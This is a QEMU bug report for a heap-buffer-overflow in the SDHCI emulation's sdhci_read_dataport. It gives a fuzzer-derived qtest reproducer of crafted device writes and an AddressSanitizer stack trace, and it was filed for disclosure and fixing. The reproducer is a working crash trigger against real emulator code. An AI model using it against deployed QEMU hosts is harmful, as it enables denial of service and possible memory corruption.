sdhci: Heap-buffer-overflow in sdhci_read_dataport
Hello,
Reproducer
cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest -m 512m \
-nodefaults -device sdhci-pci,sd-spec-version=3 -device sd-card,drive=mydrive \
-drive if=none,index=0,file=null-co://,format=raw,id=mydrive \
-nographic -qtest stdio
outl 0xcf8 0x80001010
outl 0xcfc 0xe0000000
outl 0xcf8 0x80001004
outw 0xcfc 0x7
write 0xe0000005 0x1 0x73
write 0xe0000028 0x1 0x55
write 0xe000002c 0x1 0x55
write 0x0 0x1 0x65
write 0x7 0x1 0x69
write 0x8 0x1 0x65
write 0xf 0x1 0x69
write 0x10 0x1 0x65
write 0x17 0x1 0x69
write 0x18 0x1 0x65
write 0x1f 0x1 0x69
write 0x20 0x1 0x65
write 0x27 0x1 0x69
write 0x28 0x1 0x65
write 0x2f 0x1 0x69
write 0x30 0x1 0x65
write 0x37 0x1 0x69
write 0x38 0x1 0x65
write 0x3f 0x1 0x69
write 0x40 0x1 0x65
write 0x47 0x1 0x69
write 0x48 0x1 0x65
write 0xe000000c 0x1 0x55
write 0xe000000e 0x1 0x2c
write 0xe000000f 0x1 0x5b
write 0xe0000010 0x2 0x0646
write 0x50 0x1 0x65
write 0x57 0x1 0x69
write 0x58 0x1 0x65
write 0x5f 0x1 0x69
write 0x60 0x1 0x65
write 0x67 0x1 0x69
write 0x68 0x1 0x65
write 0x6f 0x1 0x69
write 0x70 0x1 0x65
write 0x77 0x1 0x69
write 0x78 0x1 0x65
write 0x7f 0x1 0x69
write 0x80 0x1 0x65
write 0x87 0x1 0x69
write 0x88 0x1 0x65
write 0x8f 0x1 0x69
write 0x90 0x1 0x65
write 0x97 0x1 0x69
write 0x98 0x1 0x65
write 0xe0000026 0x2 0x5a06
write 0xe0000028 0x4 0x46c0c9c9
write 0xe0000028 0x1 0x55
write 0xe000002a 0x1 0x5a
write 0xa0 0x1 0x65
write 0xa5 0x1 0xff
write 0xa6 0x1 0xff
write 0xa7 0x1 0xdf
write 0xe000000c 0x1 0x27
write 0xe000000f 0x1 0x55
EOF
Stack trace
==59877==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61500001f180 at pc 0x5648eb1f52f9 bp 0x7ffd365aa900 sp 0x7ffd365aa8f8
READ of size 1 at 0x61500001f180 thread T0
#0 0x5648eb1f52f8 in sdhci_read_dataport ../hw/sd/sdhci.c:474
#1 0x5648eb1f52f8 in sdhci_read ../hw/sd/sdhci.c:996
#2 0x5648eb89aced in memory_region_read_accessor ../softmmu/memory.c:440
#3 0x5648eb8910dd in access_with_adjusted_size ../softmmu/memory.c:550
#4 0x5648eb8aa230 in memory_region_dispatch_read1 ../softmmu/memory.c:1426
#5 0x5648eb8aa230 in memory_region_dispatch_read ../softmmu/memory.c:1448
#6 0x5648ebb0f0ae in flatview_read_continue ../softmmu/physmem.c:2842
#7 0x5648ebb10924 in flatview_read ../softmmu/physmem.c:2881
#8 0x5648ebb10924 in address_space_read_full ../softmmu/physmem.c:2894
#9 0x5648ebb10924 in address_space_rw ../softmmu/physmem.c:2922
#10 0x5648eb1eff04 in dma_memory_rw_relaxed /tmp/qemu/include/sysemu/dma.h:88
#11 0x5648eb1eff04 in dma_memory_rw /tmp/qemu/include/sysemu/dma.h:127
#12 0x5648eb1eff04 in dma_memory_read /tmp/qemu/include/sysemu/dma.h:145
#13 0x5648eb1eff04 in sdhci_do_adma ../hw/sd/sdhci.c:811
#14 0x5648eb1f206f in sdhci_data_transfer ../hw/sd/sdhci.c:901
#15 0x5648eb1f8a99 in sdhci_send_command ../hw/sd/sdhci.c:376
#16 0x5648eb1f8a99 in sdhci_write ../hw/sd/sdhci.c:1186
#17 0x5648eb89a09a in memory_region_write_accessor ../softmmu/memory.c:489
OSS-Fuzz Report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36391
libqtest Reproducer: reproducer.c
Thank you
Edited by Alexander Bulekov